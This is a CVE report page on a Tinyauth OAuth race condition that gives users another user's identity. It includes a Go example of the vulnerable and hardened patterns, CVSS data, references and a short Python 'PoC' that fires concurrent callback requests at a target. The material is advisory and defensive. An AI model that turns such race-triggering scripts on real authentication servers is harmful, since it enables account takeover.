Security Vulnerability Report
CVE-2026-33544 CVSS 7.7 HIGH

Published: 2026-04-02 15:16:40
Last Modified: 2026-04-07 12:44:36

Description

Tinyauth is an authentication and authorization server. Prior to version 5.0.5, all three OAuth service implementations (GenericOAuthService, GithubOAuthService, GoogleOAuthService) store PKCE verifiers and access tokens as mutable struct fields on singleton instances shared across all concurrent requests. When two users initiate OAuth login for the same provider concurrently, a race condition between VerifyCode() and Userinfo() causes one user to receive a session with the other user's identity. This issue has been patched in version 5.0.5.
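The shape of the bug and one way to remove it, as an added Go example that is not Tinyauth's code or its actual patch: SharedStateService, PerFlowService, the provider maps and the alice/bob codes are all constructed here. The two replay functions run the losing interleaving deterministically (user A's VerifyCode, user B's VerifyCode, then user A's Userinfo) instead of relying on a real race.

```go
package main

import "sync"

// Constructed provider data: the token each auth code exchanges for, and whose token it is.
var codeToToken = map[string]string{"code-alice": "tok-alice", "code-bob": "tok-bob"}
var tokenToUser = map[string]string{"tok-alice": "alice@example.com", "tok-bob": "bob@example.com"}

// SharedStateService is the vulnerable shape: one instance serves every request and keeps
// the in-flight token in a plain field, so one user's VerifyCode overwrites another's.
type SharedStateService struct{ accessToken string }
func (s *SharedStateService) VerifyCode(code string) { s.accessToken = codeToToken[code] }
func (s *SharedStateService) Userinfo() string      { return tokenToUser[s.accessToken] }

// PerFlowService is the hardened shape: each login is keyed by its own OAuth state value
// under a mutex, and the token is consumed once when the identity is read.
type PerFlowService struct {
	mu     sync.Mutex
	tokens map[string]string // state -> access token
}

func (p *PerFlowService) VerifyCode(state, code string) {
	p.mu.Lock()
	defer p.mu.Unlock()
	p.tokens[state] = codeToToken[code]
}

func (p *PerFlowService) Userinfo(state string) (string, bool) {
	p.mu.Lock()
	defer p.mu.Unlock()
	tok, ok := p.tokens[state]
	delete(p.tokens, state) // single use: a replayed or unknown state yields "", false
	return tokenToUser[tok], ok
}

// Both replays run the losing schedule deterministically: alice's code is verified,
// bob's flow runs in between, then alice's handler asks for user info.
func SharedInterleaving() string {
	svc := &SharedStateService{}
	svc.VerifyCode("code-alice")
	svc.VerifyCode("code-bob")
	return svc.Userinfo() // bob@example.com: alice's session carries bob's identity
}

func PerFlowInterleaving() (string, bool) {
	svc := &PerFlowService{tokens: map[string]string{}}
	svc.VerifyCode("state-alice", "code-alice")
	svc.VerifyCode("state-bob", "code-bob")
	return svc.Userinfo("state-alice") // alice@example.com, true
}
```

A real server would also bind the state value to the caller's session cookie so that a pending login can only be completed by the browser that started it.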

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:tinyauth:tinyauth:*:*:*:*:*:*:*:* - VULNERABLE
Tinyauth < 5.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import threading

# Target URL
url = "https://target.tinyauth/oauth/callback"

# Simulate two user sessions attempting to login concurrently
def exploit_session(user_id):
    # Payload or state parameter specific to the user
    payload = {
        'state': f'my_state_{user_id}',
        'code': 'auth_code_placeholder'
    }
    try:
        # Send the request to trigger the race condition
        response = requests.post(url, data=payload)
        print(f"User {user_id} response status: {response.status_code}")
        if response.status_code == 200:
            print(f"User {user_id} potentially logged in.")
    except Exception as e:
        print(f"Error for user {user_id}: {e}")

# Create threads to simulate concurrent requests
threads = []
for i in range(1, 3):
    t = threading.Thread(target=exploit_session, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Exploit attempt finished. Check if User 1 received User 2's session.")

References

https://github.com/steveiliop56/tinyauth/commit/f26c2171610d5c2dfbba2edb6ccd39490e349803 (Patch)
https://github.com/steveiliop56/tinyauth/releases/tag/v5.0.5 (Product, Release Notes)
https://github.com/steveiliop56/tinyauth/security/advisories/GHSA-9q5m-jfc4-wc92 (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33544", "sourceIdentifier": "[email protected]", "published": "2026-04-02T15:16:39.553", "lastModified": "2026-04-07T12:44:36.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tinyauth is an authentication and authorization server. Prior to version 5.0.5, all three OAuth service implementations (GenericOAuthService, GithubOAuthService, GoogleOAuthService) store PKCE verifiers and access tokens as mutable struct fields on singleton instances shared across all concurrent requests. When two users initiate OAuth login for the same provider concurrently, a race condition between VerifyCode() and Userinfo() causes one user to receive a session with the other user's identity. This issue has been patched in version 5.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tinyauth:tinyauth:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.5", "matchCriteriaId": "4087737A-5C88-47C1-BD17-FFAF32802EA6"}]}]}], "references": [{"url": "https://github.com/steveiliop56/tinyauth/commit/f26c2171610d5c2dfbba2edb6ccd39490e349803", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/steveiliop56/tinyauth/releases/tag/v5.0.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": 
"https://github.com/steveiliop56/tinyauth/security/advisories/GHSA-9q5m-jfc4-wc92", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}